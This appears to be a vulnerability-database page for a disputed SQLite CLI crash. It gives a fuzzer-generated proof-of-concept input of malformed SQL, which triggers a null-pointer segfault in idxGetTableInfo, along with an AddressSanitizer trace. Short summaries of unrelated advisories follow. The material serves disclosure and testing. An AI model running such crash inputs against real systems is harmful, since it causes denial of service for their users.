Headline
CVE-2021-36690: SQLite Forum: Segmentation fault in idxGetTableInfo
** DISPUTED ** A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.
Describe
There is a segmentation fault in idxGetTableInfo,causing sqlite3 crashed.
VERSION
git-master (commit 9d41caf361ea37e7bb91c3e0635bd9dca9f06040)
trunk (8c432642572c8c4b7251f413def0725b3b8e9e7fe10230aa0aabe86b58e5902d)
date: 2021-07-07 19:44:32
System info
Ubuntu 18.04.5 LTS
clang version 10.0.0
POC content
create TEMP table t1(allint);1;
CREATE TRIGGER t02AFTER DELETE ON t1
WHEN EXISTS ( SELECT 1 FROM t0 WHERE o00.x0= y5)
BEGIN
INSERT INTO t0 VALUES(o00.x);
END;
C@EATE TABLE a0(y RE FM t1
CREATE TRIGGER t00 AFTER DELETE ON t1
WHE0)FROM t1;
INSERT INTO t1 SELECT x+8,randomblb(400)FROM t1;
INSERT INTO t1 SELECT x+16,randomblob(400)FROM t1;
INSERT INTO t1 SELECT x+32,randomblob(400)FROM t1;
INTO t1 VALUES(74,raOM t1; /* 16 */
SZVEPOINT one;
INSERT INTO t120) null, L000000000000000礸t(20WAL;
PRAGMA cache_size = 10;
CREATE TABLE t1120) null, L000000000000000 text(20) null, U000, U000000000000000>text(300) nullC L00000000000000D text(50) nulldomblob(800) FROM t1; /* 2 */
INSERT INTO t1 SELECT randomblob(8ll, P000000 text(50) n*/ ÿSERT INTO t1 SELECTGrandomblob(802001%112010) FROM t1; ;/* 8 */
INSERT INTO tH SELECT randomblob(000) FROM t1; /* 16 */
SZVEPOINT one;
INSERT INTO t120) null, L000000000000000 text000D text(50) null, F00000000000 text(100) not null,*R0000000 int not null, S00000000) not null, A0000000000 text(30) not null, L0000000 text(200) not null, A00000000000000000 int not null, R00000 int not null, N000000000000 text(1) nÿl, N0000000000000 text(1) null, N00000000 text(1) null, N000000E00000000 text(1) null, N000000000000ÿÿ0
CREATE TABLE T00(C00 inX000)0,S0000 int not null, L00000000000000 text(50) not nukl, P000000 text(50) null, ISSUEID text(50) not null, OB0ECTID text(50) not null, R0000000000 int not null, C0000000000 text(50) not nulR, A0000000 text(50) not null, C000 text(20) null, L0 CROM t1; /* 2 */ U000 int00000, P00000000000000 int00000, L000000 int00000, L00000000 int00000, U000000000M int00000, L000000 int00000, L0ERT INTO t1 VALUES(randomblob(800));t SELECT randomblob(800
INSERT INTO t1 SELECT randomblob(800) FROM t1; /* RT = WAL;
PRAGMA cachepoint;
INSERT INTO t1 VALUES(randomblob(800));VACUUM;
FROM t1; /* 2 */ randomblob(800
INSERT INTO t1 SELECT randomblob(800
PRAGMA wl_checkpoint;
INSERT INTO t1 VALUES(randoMblob(800));VACUUM;
INSEme;
ATTACH'merory:' AS noname;AL;
PRAGMA cache_size= V0;CREATE T0;
CREATE TABLE t1(x PRIMARY KEY);
PRAGMA wal_checkAS noname;
ATTACH'merory:' AS inmǭJ±;
PRAGMA tage_size = 1024;
PRAGMA journal_mode = lAL;
PRAGMA cachb_size= V0;CREATE T0;
CREATE TABLE t1(x PRIMARY KEY);
PRAGMA wal_checkpoint;
INSERT INTO t1 VALUES(rd null, C0000000000 text(50) not null, A00000nmǭJ±;
PRAGMA tage_size = 1024;
PRAGMA journal_mode = lAL;
PRAGMA cache_size= V0;CREATE T0;
CREATE TABLE t1(x PRIMARY KEY);
PRAGMA wal_checkpoint;
INSERT INTO t1 VALUES(randomblob(800));VACUUM;
INSERT INT- tÿÿÿme;
ATTACH'merory:' AS inm§mJ±;
PRAGMA tage_size = 1024;
PRAGMA journal_mode = WAL;
PRAGMA cache_size= V0;CREATE T0;
CREATE TABLEÿÿx PRIMARY KEY);
PRAGMA wal_checkpoint;
INSERT INTO t1 VALUES(randomblob(800));VACUUM;
CROM t1; /* 2 */ randomblob(800
INSERT INTO t1 SELECT randomblob(800) FROM t1; /* RT = WAL;
PRAGMA caory:' AS inm§mJ±;
PRAGMA tage_size = 1RAGMA journal_mode = WAL;2 */
INSERT INTO t1 SELECT randomblob(800
PRAGMA wl]checkpoint;
IN ERT INTO t1 VALUES(randoMblob(800));VACUUM;
INSERT INTO t1 SEme;
ATTACH'merory:' AS noname;
ATTACH'merory:' AS A cache_size;
PRAGMA tage_size = 1024;
PRAGMA journal_mode = lAL;
PRAGMA cache_s10) FROM t1; ATE T0;
CREATE TABLE t1TTACH'merory:' AS 0;
CREATE TABLE tF(x PRIMARY KEY);
PRAGMA wal_chBckpoint;
INSERT INTO t1ALUES(randomblob(800));VA
ώώώ
J
/
.expe
-
-s 1:
/
.expώώώώώώώώώώώώώώώώώώώώώώLECT randomblob(800) FROM t1; /* RT = WAL;
PRAGMA cache_size= V0;CREA0;
AREATE TABLE t1(x PRIMARY KEY);
PRAGMA wal_checkpoint;
INSERT INinmGmJme;
ASAN OUTPUT
==46696==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f2d6f5974e1 bp 0x7ffeecd46930 sp 0x7ffeecd460e8 T0)
==46696==The signal is caused by a READ memory access.
==46696==Hint: address points to the zero page.
#0 0x7f2d6f5974e1 /build/glibc-S9d2JN/glibc-2.27/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
#1 0x42f058 in strlen /home/brian/src/final/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc
#2 0x5282b8 in idxGetTableInfo (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5282b8)
#3 0x4d3091 in idxCreateVtabSchema (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d3091)
#4 0x4d27e4 in sqlite3_expert_new (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d27e4)
#5 0x5426f5 in expertDotCommand (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5426f5)
#6 0x4e3df0 in do_meta_command (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4e3df0)
#7 0x4fbe79 in process_input (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4fbe79)
#8 0x4dc0c7 in main (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4dc0c7)
#9 0x7f2d6f42abf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#10 0x41c579 in _start (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x41c579)Related news
Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 16, iOS 16, watchOS 9. An app may be able to execute arbitrary code with kernel privileges.
A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
This issue was addressed with improved entitlements. This issue is fixed in iOS 16, watchOS 9. An app may be able to read a persistent device identifier.
A logic issue was addressed with improved state management. This issue is fixed in iOS 16. Deleted contacts may still appear in spotlight search results.
Apple Security Advisory 2022-10-27-13 - watchOS 9 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.
Apple Security Advisory 2022-10-27-11 - tvOS 16 addresses buffer overflow, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).